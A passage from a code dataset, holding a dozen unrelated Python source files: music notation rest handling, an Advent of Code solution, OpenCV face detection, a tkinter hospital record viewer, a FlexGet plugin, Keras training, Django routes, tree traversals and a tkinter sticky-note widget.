\"\"\"\n source = ly.document.Source(cursor, True, tokens_with_position=True)\n with cursor.document as d:\n for token in source:\n if isinstance(token, ly.lex.lilypond.Rest):\n if token == 'R':\n d[token.pos:token.end] = replace_token\n\ndef replace_spacer(cursor, replace_token):\n \"\"\"Replace spacer rests (s) with optional token. \"\"\"\n source = ly.document.Source(cursor, True, tokens_with_position=True)\n with cursor.document as d:\n for token in source:\n if isinstance(token, ly.lex.lilypond.Spacer):\n d[token.pos:token.end] = replace_token\n\ndef replace_restcomm(cursor, replace_token):\n r\"\"\"Replace rests by rest command (\\rest) with optional token. \"\"\"\n\n def get_comm_rests(source):\n r\"\"\"Catch all rests by rest command (\\rest) from source.\"\"\"\n rest_tokens = None\n for token in source:\n if isinstance(token, ly.lex.lilypond.Note):\n rest_tokens = [token]\n continue\n if rest_tokens and isinstance(token, ly.lex.Space):\n rest_tokens.append(token)\n continue\n if rest_tokens and isinstance(token, ly.lex.lilypond.Command):\n if token == '\\\\rest':\n rest_tokens.append(token)\n yield rest_tokens\n rest_tokens = None\n \n source = ly.document.Source(cursor, True, tokens_with_position=True)\n with cursor.document as d:\n for rt in get_comm_rests(source):\n note = rt[0]\n space = rt[-2]\n comm = rt[-1]\n d[note.pos:note.end] = replace_token\n del d[space.pos:space.end]\n del d[comm.pos:comm.end]\n\n","repo_name":"frescobaldi/python-ly","sub_path":"ly/rests.py","file_name":"rests.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"61"} +{"seq_id":"9506641760","text":"from collections import deque\nimport re\n\n# read in the data\nwith open(\"PuzzleInputs/16\", \"r\") as f:\n\tdata = f.read()\n\nmoves = data.replace('\\n', '').split(',')\n\n#\n#\tPart 1\n#\n\n# returns a list of all the numbers found within string `s`\ndef get_all_nums(s):\n\treturn re.findall(\"[-+]?[.]?[\\d]+(?:,\\d\\d\\d)*[\\.]?\\d*(?:[eE][-+]?\\d+)?\", s)\n\n# generates the programs in their initial state\ndef generate_programs():\n\tprograms = []\n\tfor i in range(0, 16):\n\t\tprograms.append(chr(97 + i))\n\treturn programs\n\n# makes 'count' programs move from the end to the front, but maintain their order otherwise\ndef spin(programs, count):\n\titems = deque(programs)\n\titems.rotate(count)\n\treturn list(items)\n\n# makes the programs at positions `i` and `j` swap places\ndef exchange(programs, i, j):\n\ttemp = programs[i]\n\tprograms[i] = programs[j]\n\tprograms[j] = temp\n\n# makes the programs named `a` and `b` swap places\ndef partner(programs, a, b):\n\ti = programs.index(a)\n\tj = programs.index(b)\n\texchange(programs, i, j)\n\n# returns the programs' positions at the end of their dance(s)\ndef dance(moves, dances):\n\tprograms = generate_programs()\n\n\thistory = []\n\n\t# dance FOREVER\n\tfor i in range(0, dances):\n\t\t# if dancers were in this position in the past, found dance cycle\n\t\tpositions = ''.join(programs)\n\t\tif positions in history:\n\t\t\treturn history[dances % i]\n\t\thistory.append(positions)\n\n\t\t# haven't had these starting positions before, so do the moves\n\t\tfor move in moves:\n\t\t\t# spin - \"sX\"\n\t\t\tif move[:1] == 's':\n\t\t\t\tprograms = spin(programs, int(get_all_nums(move)[0]))\n\t\n\t\t\t# exchange - \"xA/B\"\n\t\t\tif move[:1] == 'x':\n\t\t\t\tnums = get_all_nums(move)\n\t\t\t\texchange(programs, int(nums[0]), int(nums[1]))\n\n\t\t\t# partner - \"pA/B\"\n\t\t\tif move[:1] == 'p':\n\t\t\t\tpartner(programs, list(move)[1], list(move)[3])\n\t\t\n\treturn ''.join(programs)\n\t\nlast_dance_position = dance(moves, 1)\nprint(last_dance_position)\n\n#\n#\tPart 2\n#\n\n# had to make use of memoization to properly solve this - and I shamelessly partook of some Reddit help to do so :P\nbillion_dances = dance(moves, 1000000000)\nprint(billion_dances)\n","repo_name":"goddtriffin/AdventOfCode-2017","sub_path":"day16.py","file_name":"day16.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13624690254","text":"import cv2\n\nkepala = cv2.CascadeClassifier('haar_frontal_detect.xml')\nmulut = cv2.CascadeClassifier('haar_mouth.xml')\nvideo_capture = cv2.VideoCapture(0)\n\nwhile True:\n\n # Capture frame-by-frame\n retval, frame = video_capture.read()\n\n # Convert to grayscale\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Detect features specified in Haar Cascade\n deteksi_kepala = kepala.detectMultiScale(\n gray,\n scaleFactor=1.3,\n minNeighbors=5,\n minSize=(20, 20)\n )\n\n # Draw a rectangle around recognized faces \n total_kepala = 0\n for (x, y, w, h) in deteksi_kepala:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (200, 50, 50), 2)\n total_kepala = total_kepala + 1\n cv2.putText(frame, ('%02d_kepala Terdeteksi' % total_kepala), (x,y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv2.LINE_AA)\n \n # Detect features specified in Haar Cascade\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = frame[y:y+h, x:x+w]\n deteksi_mulut = mulut.detectMultiScale(roi_gray)\n for (mx,my,mw,mh) in deteksi_mulut:\n cv2.rectangle(roi_color,(mx,my),(mx+mw,my+mh),(0,255,0),2)\n\n # Display the resulting frame\n cv2.imshow('Video', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything is done, release the capture\nvideo_capture.release()\ncv2.destroyAllWindows()","repo_name":"Muhamad-Rizaludin/Python-Face-detection-With-Frame-Opencv","sub_path":"frontal_detection.py","file_name":"frontal_detection.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15863606713","text":"import tkinter as tk\nimport mysql.connector\nfrom tkinter import ttk\nimport os\nimport sys\n\n# Connect to the database\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=os.environ['USER'],\n password=os.environ['PASS'],\n database=\"HOSPITAL\"\n)\nmycursor = mydb.cursor()\n\npatient_id = sys.argv[1]\nmycursor.execute(\"SELECT * from Patient where Patient_ID= %s\", (patient_id,))\npatient = mycursor.fetchone()\n\nmycursor.execute(\n \"SELECT sum(Bill_Amount) from Billing where Doctor_ID= %s\", (patient_id,))\namount = mycursor.fetchone()[0]\n\nmycursor.execute(\n \"SELECT * from Medical_History where Patient_ID= %s\", (patient_id,))\nappointments = mycursor.fetchall()\n# Get the column names\ncolumn_names = [i[0] for i in mycursor.description]\n\n# Calculate the maximum width of each column\nmax_widths = []\nfor i in range(len(column_names)):\n max_width = len(column_names[i])\n for result in appointments:\n if len(str(result[i])) > max_width:\n max_width = len(str(result[i]))\n max_widths.append(max_width)\n\n# Create the Tkinter window\nwindow = tk.Tk()\nwindow.title(\"Patient Information\")\n\n# Create the frame for the hospital name and number of doctors and nurses\nheader_frame = tk.Frame(window)\nheader_frame.pack(side=tk.TOP, fill=tk.X)\n\n# Create the label for the Patient Details\nhospital_name_label = tk.Label(\n header_frame, text=\"Patient Name: \" + patient[1], font=(\"Ariel\", 14))\nhospital_name_label.pack(side=tk.TOP)\n\nhospital_name_label = tk.Label(\n header_frame, text=\"DOB: \" + str(patient[3]), font=(\"Ariel\", 14))\nhospital_name_label.pack(side=tk.TOP)\n\nhospital_name_label = tk.Label(\n header_frame, text=\"Contact Number: \" + str(patient[2]), font=(\"Ariel\", 14))\nhospital_name_label.pack(side=tk.TOP)\n\nhospital_name_label = tk.Label(\n header_frame, text=\"Gender: \" + patient[4], font=(\"Ariel\", 14))\nhospital_name_label.pack(side=tk.TOP)\n\nhospital_name_label = tk.Label(\n header_frame, text=\"Insurance: \" + str(patient[5]), font=(\"Ariel\", 14))\nhospital_name_label.pack(side=tk.TOP)\n\n# Create the label for the number of nurses\nnum_nurses_label = tk.Label(\n header_frame, text=f\"Bill: {amount}\", font=(\"Ariel\", 14))\nnum_nurses_label.pack(side=tk.TOP)\n\n# Create the treeview\ntree = ttk.Treeview(window, columns=column_names, show=\"headings\")\n\n# Set the column headings from the department table\nfor col in column_names:\n tree.heading(col, text=col)\n\n# Set the column widths relative to the data\nfor i, width in enumerate(max_widths):\n tree.column(column_names[i], width=width*12)\n\n# Align the columns to the center\ntree.column(\"#0\", anchor=\"center\")\nfor col in column_names:\n tree.heading(col, anchor=\"center\")\n\n# Insert the data into the treeview\nfor result in appointments:\n tree.insert(\"\", tk.END, values=result)\n\n# Pack the treeview\ntree.pack(fill=\"both\", expand=True)\n\n# Function to retrieve data from the selected row and print it to the console\n\n\ndef print_selected_data(event):\n selected_row = tree.focus()\n selected_data = tree.item(selected_row)['values']\n # make a popup window with showing diagnosis and taking treatment from the diagnosis table\n diagnosis = selected_data[2]\n mycursor.execute(\n \"SELECT * from Diagnosis where Diagnosis= %s\", (diagnosis,))\n diagnosis_result = mycursor.fetchone()\n diagnosis = diagnosis_result[0]\n treatment = diagnosis_result[1]\n\n # create a popup window with the diagnosis and treatment\n popup = tk.Tk()\n popup.wm_title(\"Diagnosis\")\n popup.geometry(\"400x200\")\n\n label1 = ttk.Label(popup, text=\"Diagnosis:\", font=(\"Ariel\", 14))\n label1.pack(side=\"top\", pady=10)\n diagnosis_label = ttk.Label(popup, text=diagnosis, font=(\"Ariel\", 12))\n diagnosis_label.pack(side=\"top\", pady=10)\n\n label2 = ttk.Label(popup, text=\"Treatment:\", font=(\"Ariel\", 14))\n label2.pack(side=\"top\", pady=10)\n treatment_label = ttk.Label(popup, text=treatment, font=(\"Ariel\", 12))\n treatment_label.pack(side=\"top\", pady=10)\n\n B1 = ttk.Button(popup, text=\"Okay\", command=popup.withdraw)\n B1.pack(side=\"bottom\", pady=10)\n\n popup.mainloop()\n\n\n# Bind the on-click event to the treeview\ntree.bind(\"<>\", print_selected_data)\n\n# Start the Tkinter event loop\nwindow.mainloop()\n","repo_name":"Saksham0109/Hospital-Management-System","sub_path":"src/Patient_Dets.py","file_name":"Patient_Dets.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74480521473","text":"from random import randint\n\n\ninput(\"my message\") # str\nint(\"my string\") # int\n\nmyRand = randint(0, 100)\n\n\ni = 0\n\nwhile True :\n i += 1\n if i >= 10 :\n break\n stuff\n\nwhile i < 10 :\n stuff\n \n\n\n# 1 : the computer chooses a random number [0,100]\n# 2 : it asks a number INPUT\n# 3 : it checks the number [0,100]\n# if number > rand : \"less\"\n# elif number < rand : \"more\"\n# else : \"you won\" -> ends the program\n# 4 : go back to 2.","repo_name":"firgaty/python_tutorial","sub_path":"examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"905272733","text":"\"\"\"Plugin for text file or URL feeds via regex.\"\"\"\nfrom __future__ import unicode_literals, division, absolute_import\nfrom builtins import * # noqa pylint: disable=unused-import, redefined-builtin\n\nimport re\nimport logging\n\nimport path\n\nfrom flexget import plugin\nfrom flexget.entry import Entry\nfrom flexget.event import event\nfrom flexget.utils.cached_input import cached\n\nlog = logging.getLogger('text')\n\n\nclass Text(object):\n \"\"\"\n Parse any text for entries using regular expression.\n\n Example::\n\n url: \n entry:\n : \n format:\n : \n\n Note: each entry must have atleast two fields, title and url\n\n Example::\n\n text:\n url: http://www.nbc.com/Heroes/js/novels.js\n entry:\n title: novelTitle = \"(.*)\"\n url: novelPrint = \"(.*)\"\n format:\n url: http://www.nbc.com%(url)s\n \"\"\"\n schema = {\n 'type': 'object',\n 'properties': {\n 'url': {\n 'oneOf': [\n {'type': 'string', 'format': 'url'},\n {'type': 'string', 'format': 'file'}\n ]\n },\n 'encoding': {'type': 'string'},\n 'entry': {\n 'type': 'object',\n 'properties': {\n 'url': {'type': 'string', 'format': 'regex'},\n 'title': {'type': 'string', 'format': 'regex'}\n },\n 'additionalProperties': {'type': 'string', 'format': 'regex'},\n 'required': ['url', 'title']\n },\n 'format': {\n 'type': 'object',\n 'additionalProperties': {'type': 'string'}\n }\n },\n 'required': ['entry', 'url'],\n 'additonalProperties': False\n }\n\n def format_entry(self, entry, d):\n for k, v in d.items():\n entry[k] = v % entry\n\n @cached('text')\n @plugin.internet(log)\n def on_task_input(self, task, config):\n url = config['url']\n if '://' in url:\n lines = task.requests.get(url).text.split('\\n')\n else:\n lines = path.Path(url).lines(encoding=config.get('encoding', 'utf-8'))\n\n entry_config = config.get('entry')\n format_config = config.get('format', {})\n\n entries = []\n # keep track what fields have been found\n used = {}\n entry = Entry()\n\n # now parse text\n for line in lines:\n for field, regexp in entry_config.items():\n # log.debug('search field: %s regexp: %s' % (field, regexp))\n match = re.search(regexp, line)\n if match:\n # check if used field detected, in such case start with new entry\n if field in used:\n if entry.isvalid():\n log.info('Found field %s again before entry was completed. \\\n Adding current incomplete, but valid entry and moving to next.' % field)\n self.format_entry(entry, format_config)\n entries.append(entry)\n else:\n log.info('Invalid data, entry field %s is already found once. Ignoring entry.' % field)\n # start new entry\n entry = Entry()\n used = {}\n\n # add field to entry\n try:\n entry[field] = match.group(1)\n except IndexError:\n log.error('regex for field `%s` must contain a capture group' % field)\n raise plugin.PluginError('Your text plugin config contains errors, please correct them.')\n used[field] = True\n log.debug('found field: %s value: %s' % (field, entry[field]))\n\n # if all fields have been found\n if len(used) == len(entry_config):\n # check that entry has atleast title and url\n if not entry.isvalid():\n log.info('Invalid data, constructed entry is missing mandatory fields (title or url)')\n else:\n self.format_entry(entry, format_config)\n entries.append(entry)\n log.debug('Added entry %s' % entry)\n # start new entry\n entry = Entry()\n used = {}\n return entries\n\n\n@event('plugin.register')\ndef register_plugin():\n plugin.register(Text, 'text', api_ver=2)\n","repo_name":"bragatrosco/flexget","sub_path":"lib/python2.7/site-packages/flexget/plugins/input/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31819255638","text":"import re\n\ns = input()\nsub_s = input()\n\n\ndef string_finder(sq, sub_sq):\n all_mats = []\n\n match = re.search(sub_sq, sq)\n\n if match is None:\n print('(-1, -1)')\n else:\n all_mats.append((match.start(), match.end()-1))\n x = match.start() + 1\n while match.start() != -1:\n # trim the strings\n new_match = re.search(sub_s, s[x:])\n if new_match is None:\n break\n if new_match.start() != -1:\n all_mats.append((new_match.start() + x, new_match.end() + x - 1))\n x += new_match.start() + 1\n\n\n for mat in all_mats:\n print(f'({mat[0]}, {mat[1]})')\n\n\nstring_finder(s, sub_s)\n","repo_name":"khushaal-nandwani/google-kickstart","sub_path":"regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17887194252","text":"#https://stackoverflow.com/questions/14058340/adding-noise-to-a-signal-in-python\n\n# Signal Generation\n# matplotlib inline\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\n#ejemplo de un vector de 11 elementos que empieza en cero y termina en 100\nt = np.linspace(0, 100, 11)\nprint(t)\n\ndef linspace_with_step(start, stop, step):\n elements = math.ceil((stop - start) / step) + 1\n return np.linspace(start, stop, elements)\n\nt = linspace_with_step(0, 10, 2)\nprint(t)\n\n\nt = np.linspace(1, 100, 1000)\nx_volts = 10*np.sin(t/(2*np.pi))\n#Grafico con 3 filas, 1 columna, el primer grafico va a la fila 1\nplt.subplot(3,1,1)\nplt.plot(t, x_volts)\nplt.title('Signal')\nplt.ylabel('Voltage (V)')\nplt.xlabel('Time (s)')\n\nx_watts = x_volts ** 2\n#Grafico con 3 filas, 1 columna, el primer grafico va a la fila 2\nplt.subplot(3,1,2)\nplt.plot(t, x_watts)\nplt.title('Signal Power')\nplt.ylabel('Power (W)')\nplt.xlabel('Time (s)')\n\nx_db = 10 * np.log10(x_watts)\n#Grafico con 3 filas, 1 columna, el primer grafico va a la fila 3\nplt.subplot(3,1,3)\nplt.plot(t, x_db)\nplt.title('Signal Power in dB')\nplt.ylabel('Power (dB)')\nplt.xlabel('Time (s)')\nplt.show()\n","repo_name":"sebapastore/digital_modulation","sub_path":"signal_plot.py","file_name":"signal_plot.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20527168385","text":"\"\"\"\nRoutine that configures on-board inertial measurement unit (IMU).\n\"\"\"\nfrom lib.pycubed import cubesat\nimport time\n\n\nwhile True:\n\n # Read acceleration, magnetometer, gyroscope, temperature.\n accel_x, accel_y, accel_z = cubesat.acceleration\n mag_x, mag_y, mag_z = cubesat.magnetic\n gyro_x, gyro_y, gyro_z = cubesat.gyro\n temp = cubesat.temperature\n\n # Print values.\n print(f\"Acc (m/s^2): x: {accel_x}\\ty: {accel_y}\\tz: {accel_z}\")\n print(f\"Mag (uT): x: {mag_x}\\ty: {mag_y}\\tz: {mag_z}\")\n print(f\"Gyro (deg/sec): x: {gyro_x}\\ty: {gyro_y}\\tz: {gyro_z}\")\n print(f\"Temperature: {temp}C\\n\")\n\n # Delay for 1 second\n time.sleep(1)","repo_name":"alxklso/pycubed-software-default","sub_path":"v5-code-examples/imu.py","file_name":"imu.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"74580737154","text":"from key_only_binary_tree import DATA, LEFT, RIGHT, print_tree, tree\nfrom random import shuffle\n\n\ndef tree_insert(tree, data):\n if not tree:\n tree += [data, None, None]\n return\n\n parent = node = tree\n while node != None:\n parent = node\n\n if data < node[DATA]:\n node = node[LEFT]\n elif data > node[DATA]:\n node = node[RIGHT]\n\n if data < parent[DATA]:\n parent[LEFT] = [data, None, None]\n elif data > parent[DATA]:\n parent[RIGHT] = [data, None, None]\n\n\nvisited = []\n\n\ndef tree_dfs(tree):\n if tree == None or tree[DATA] in visited:\n return\n\n print(tree[DATA], end=' ')\n visited.append(tree[DATA])\n tree_dfs(tree[LEFT])\n tree_dfs(tree[RIGHT])\n\n\ndef tree_bfs(tree):\n should_visit = []\n print(tree[DATA], end=' ')\n should_visit.append(tree[LEFT])\n should_visit.append(tree[RIGHT])\n\n while should_visit:\n node = should_visit.pop(0)\n if node == None:\n continue\n print(node[DATA], end=' ')\n\n should_visit.append(node[LEFT])\n should_visit.append(node[RIGHT])\n\n\ndef preorder(tree):\n if tree == None:\n return\n\n print(tree[DATA], end=' ')\n preorder(tree[LEFT])\n preorder(tree[RIGHT])\n\n\ndef inorder(tree):\n if tree == None:\n return\n\n inorder(tree[LEFT])\n print(tree[DATA], end=' ')\n inorder(tree[RIGHT])\n\n\ndef postorder(tree):\n if tree == None:\n return\n\n postorder(tree[LEFT])\n postorder(tree[RIGHT])\n print(tree[DATA], end=' ')\n\n\n# 무작위로 만들어진 이진 탐색 트리를 준비한다.\nNUMBER_OF_NODES = 8\nnumbers = list(range(NUMBER_OF_NODES))\nshuffle(numbers)\n\nfor num in numbers:\n tree_insert(tree, num)\n\nprint_tree(tree)\n\n\nprint('\\nPreorder:')\npreorder(tree)\nprint('\\nInorder:')\ninorder(tree)\nprint('\\nPostorder:')\npostorder(tree)\nprint('\\n너비 우선 탐색:')\ntree_bfs(tree)\nprint('\\n깊이 우선 탐색:')\ntree_dfs(tree)\nprint()\n","repo_name":"lens0021/snippets","sub_path":"tree_searchs.py","file_name":"tree_searchs.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"14297012649","text":"\"\"\"\n268. Missing Number\nhttps://leetcode.com/problems/missing-number/\n\"\"\"\n\nclass Solution:\n def missingNumber(self, nums: List[int]) -> int:\n\n # Cyclic sort\n # [1] extend nums with new element -1\n # [2] loop i through nums\n # [3] if nums[i] == -1 or i != nums[i], then swap nums[i] and nums[nums[i]], else incrmeent i\n # [4] loop through nums again and return the index of the -1\n # O(n) time and O(1) space\n nums.append(-1)\n i, n = 0, len(nums)\n while i < n:\n j = nums[i]\n if j == -1 or i == j:\n i += 1\n else:\n nums[i], nums[j] = nums[j], nums[i]\n\n for i, v in enumerate(nums):\n if v == -1:\n return i\n\n # Array copy\n # [1] Create an array of all integers in order, all_ints\n # [2] For n in nums set, set all_ints[n] = -1\n # [3] Loop through all_ints and return the first element that is not -1\n # O(n) time and O(n) space\n# all_ints = list(range(len(nums)+1))\n\n# for n in nums:\n# all_ints[n] = -1\n\n# for n in all_ints:\n# if n >= 0:\n# return n","repo_name":"mathvolcano/leetcode","sub_path":"0268_missingNumber.py","file_name":"0268_missingNumber.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16392382770","text":"import numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, Dense, Flatten\n\npath_save = 'd:/study_data/_save/men_women/'\n\nmw_x_train = np.load(path_save + 'keras56_mw_x_train.npy')\nmw_x_test = np.load(path_save + 'keras56_mw_x_test.npy')\nmw_y_train = np.load(path_save + 'keras56_mw_y_train.npy')\nmw_y_test = np.load(path_save + 'keras56_mw_y_test.npy')\n\n#모델구성\nmodel = Sequential()\nmodel.add(Conv2D(32, (2, 2), input_shape=(200, 200, 3), activation='relu'))\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(Flatten())\nmodel.add(Dense(16, activation='relu'))\nmodel.add(Dense(1, activation='sigmoid'))\n\nmodel.compile(loss = 'binary_crossentropy', optimizer = 'adam', metrics = ['acc'])\nhist = model.fit(mw_x_train, mw_y_train, epochs=100,validation_data = (mw_x_test, mw_y_test))\n\nloss = model.evaluate(mw_x_test, mw_y_test)\nprint('loss:', loss)\n\ny_predict = model.predict(mw_x_test)\nfrom sklearn.metrics import accuracy_score\n\nacc = accuracy_score(mw_y_test,np.round(y_predict) )\nprint('acc:', acc)","repo_name":"rlaxoghd0513/study","sub_path":"keras/keras56_4_men_women_load_npy.py","file_name":"keras56_4_men_women_load_npy.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9368870848","text":"from django.urls import path\nfrom rest_framework import routers\nfrom . import views\n\n# restaurants/\n# restaurants/1/info\n\n\"\"\"\nrouter = routers.DefaultRouter() # add this\nrouter.register(r'frontend', views.RestaurantView,\n 'front') # add this\n\"\"\"\n\nurlpatterns = [\n path('', views.index, name=\"restaurants_index\"),\n path('', views.detail, name='restaurants_detail'),\n path('predict', views.ModelPredict.as_view(), name='predict_result'),\n path('fetch', views.RestaurantView.as_view(), name='fetch_restaurants'),\n path('name', views.NameView.as_view(), name='name_restaurants'),\n path('search', views.SearchView.as_view(), name=\"search_engine_result\")\n]\n\"\"\"\nurlpatterns += router.urls\n\"\"\"\n","repo_name":"KyraZzz/Chatbot_restaurant","sub_path":"py_chatbot/restaurants/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6491071188","text":"from tkinter import Toplevel, Text, Listbox\nfrom tkinter.ttk import Frame, Label, Entry, Button\nfrom collections import defaultdict\n\n\nnum = defaultdict(int)\ndef numerate(pre):\n \"\"\" A function for making unique IDs\n 'pre' : string\n Returns a string combining the prefix\n with a unique number.\n \"\"\"\n global num\n num[pre] += 1\n return \"{}{}\".format(pre, num[pre])\n\nclass Sticker(Frame):\n def __init__(self, parent, pos, name):\n Frame.__init__(self, parent)\n self.pack()\n self.parent = parent\n self.pos = pos\n self.name = name\n self.drawing = False\n self.w_id = None\n self.size = (250, 220)\n self.entries = []\n self.text = []\n self.my_lines = {}\n self.links = []\n self.rect_id = None\n self.bindings(self)\n\n def bindings(self, w):\n w.bind(\"\", self.move)\n w.bind(\"\", self.draw_line)\n w.bind(\"\", self.pair_boxes)\n w.bind(\"\", self.move_line)\n\n\n def pair_boxes(self, e):\n if self.drawing:\n x,y = self.parent.mouse_coords()\n overlap = self.parent.find_overlapping(x-5, y-5, x+5, y+5)\n to_be_removed = True\n if len(overlap) >= 2:\n for sticky in self.parent.stickies:\n if self.parent.stickies[sticky].w_id == overlap[0] and self.w_id != overlap[0]:\n self.connect2box(sticky)\n self.save_connect(sticky)\n to_be_removed = False\n if to_be_removed:\n self.parent.delete(self.my_line)\n self.drawing = False\n\n def connect2box(self, other, load=False):\n coords = self.parent.stickies[other].pos\n if load:\n self.my_line = self.parent.create_line(self.pos[0], self.pos[1], coords[0], coords[1], fill=\"green\", width=3)\n else:\n self.parent.coords(self.my_line, self.pos[0], self.pos[1], coords[0], coords[1])\n self.my_lines[self.my_line] = [self.pos[0], self.pos[1], coords[0], coords[1]]\n self.parent.stickies[other].my_lines[self.my_line] = [coords[0], coords[1], self.pos[0], self.pos[1]]\n\n def save_connect(self, other):\n if other not in self.links:\n self.links.append(other)\n if self.name not in self.parent.stickies[other].links:\n self.parent.stickies[other].links.append(self.name)\n\n def draw_line(self, e):\n self.drawing = True\n new_x, new_y = self.parent.mouse_coords()\n self.my_line = self.parent.create_line(self.pos[0], self.pos[1], new_x, new_y, fill=\"green\", width=3)\n\n def move_line(self, e):\n if self.drawing:\n new_x, new_y = self.parent.mouse_coords()\n self.parent.coords(self.my_line, (self.pos[0], self.pos[1], new_x, new_y))\n \n def move(self, e):\n self.parent.move(self.w_id, e.x, e.y)\n self.parent.move(self.rect_id, e.x, e.y)\n self.pos = tuple([int(co) for co in self.parent.coords(self.w_id)])\n for line in self.my_lines.keys():\n self.parent.coords(line, self.pos[0], self.pos[1], self.my_lines[line][2], self.my_lines[line][3])\n for sticky in self.parent.stickies:\n if sticky != self.name:\n if line in self.parent.stickies[sticky].my_lines.keys():\n self.parent.stickies[sticky].my_lines[line][2] = int(self.pos[0])\n self.parent.stickies[sticky].my_lines[line][3] = int(self.pos[1])\n\n def add_entry(self, text):\n entry = Entry(self)\n entry.insert(0, \",\".join(text))\n entry.pack(fill=\"both\", expand=True)\n entry.config(state=\"readonly\")\n self.bindings(entry)\n self.entries.append(entry)\n\n def add_text(self, text):\n w, h = self.size\n field = Text2(self, width=w, height=h)\n field.pack()\n field.insert(\"1.0\", text)\n field.config(state=\"disable\")\n self.bindings(field)\n self.text.append(field)\n\n def add_buttons(self):\n frame = Frame(self)\n frame.pack(fill=\"x\")\n edit = Button(frame, text=\"Edit\", command=self.edit)\n edit.pack(side=\"right\", padx=5, pady=5)\n delete = Button(frame, text=\"Del\", command=self.delete_menu)\n delete.pack(side=\"right\")\n\n def draw_box(self, color=\"green\", box_id=None):\n x1 = self.pos[0]-(self.size[0]/2)\n y1 = self.pos[1]-(self.size[1]/2)\n x2 = x1 + self.size[0]\n y2 = y1 + self.size[1]\n ad = 27 #<--Adjustment variable\n bbox = ((x1, y1-ad), (x2, y2+ad))\n if not box_id:\n self.rect_id = self.parent.create_rectangle(bbox, width=7., outline=color)\n else:\n self.parent.coords(box_id, (x1, y1-ad, x2, y2+ad))\n\n\n def edit(self):\n entries = [field.get() for field in self.entries]\n text = [text.get(\"1.0\", \"end-1c\") for text in self.text]\n links = self.links\n node = self.parent.make_node(self.name, self.pos, (entries, text), links, edit=True)\n\n def delete_menu(self):\n delmenu = Node(self, self.name, self.pos)\n item_list = [\"This box: {}\".format(self.name)]\n for lin in self.links:\n item_list.append(\"The line to: {}\".format(lin))\n delmenu.insert_list(item_list)\n\n def delete_items(self, inx):\n for j in inx:\n if j == 0: #<---Selected the Box.\n self.parent.delete(self.rect_id)\n for link in self.links:\n self.remove_line(link)\n for stick in self.parent.stickies:\n if stick != self.name:\n for link in self.parent.stickies[stick].links:\n if link == self.name:\n self.parent.stickies[stick].links.remove(link)\n del self.parent.stickies[self.name]\n self.destroy()\n else: #<---Selected a line.\n self.remove_line(self.links[j-1])\n self.links.remove(self.links[j-1])\n\n def remove_line(self, node):\n to_be_removed = []\n for stick in self.parent.stickies:\n if self.parent.stickies[stick].name == node:\n for link in self.parent.stickies[stick].links:\n if link == self.name:\n self.parent.stickies[stick].links.remove(link)\n for i in self.parent.stickies[stick].my_lines:\n if i in self.my_lines.keys():\n to_be_removed.append(i)\n for j in to_be_removed:\n del self.parent.stickies[stick].my_lines[j]\n for h in to_be_removed:\n self.parent.delete(h)\n\n\n\n\nclass Node(Toplevel):\n \"\"\" This class is a catchall for all popup windows.\"\"\"\n def __init__(self, parent, name, pos=(0,0), edit=False):\n Toplevel.__init__(self)\n self.parent = parent\n self.name = name\n self.pos = pos\n self.edit = edit\n self.links = []\n self.entries = {\"Entry\":{}, \"Text\":{}}\n self.resizable(0,0)\n self.frame = Frame(self)\n self.frame.pack(side=\"right\", fill=\"y\", expand=True)\n\n def save(self):\n for i in self.entries[\"Entry\"]:\n entry = self.entries[\"Entry\"][i].get()\n entr_list = entry.split(\",\")\n self.entries[\"Entry\"][i] = entr_list\n for i in self.entries[\"Text\"]:\n self.entries[\"Text\"][i] = self.entries[\"Text\"][i].get(\"1.0\", \"end-1c\")\n self.destroy()\n self.parent.save_info(self.name, self.entries, self.pos, self.links, self.edit)\n\n def ok_cancel_buttons(self, call=None):\n if not call:\n call = self.save\n button_frame = Frame(self.frame)\n ok_button = Button(button_frame, text=\"Ok\", command=call)\n cancel_button = Button(button_frame, text=\"Cancel\", command=self.destroy)\n button_frame.pack(fill=\"x\")\n cancel_button.pack(side=\"right\", padx=5, pady=5)\n ok_button.pack(side=\"right\")\n\n def insert_list(self, items):\n frame = self.frame\n 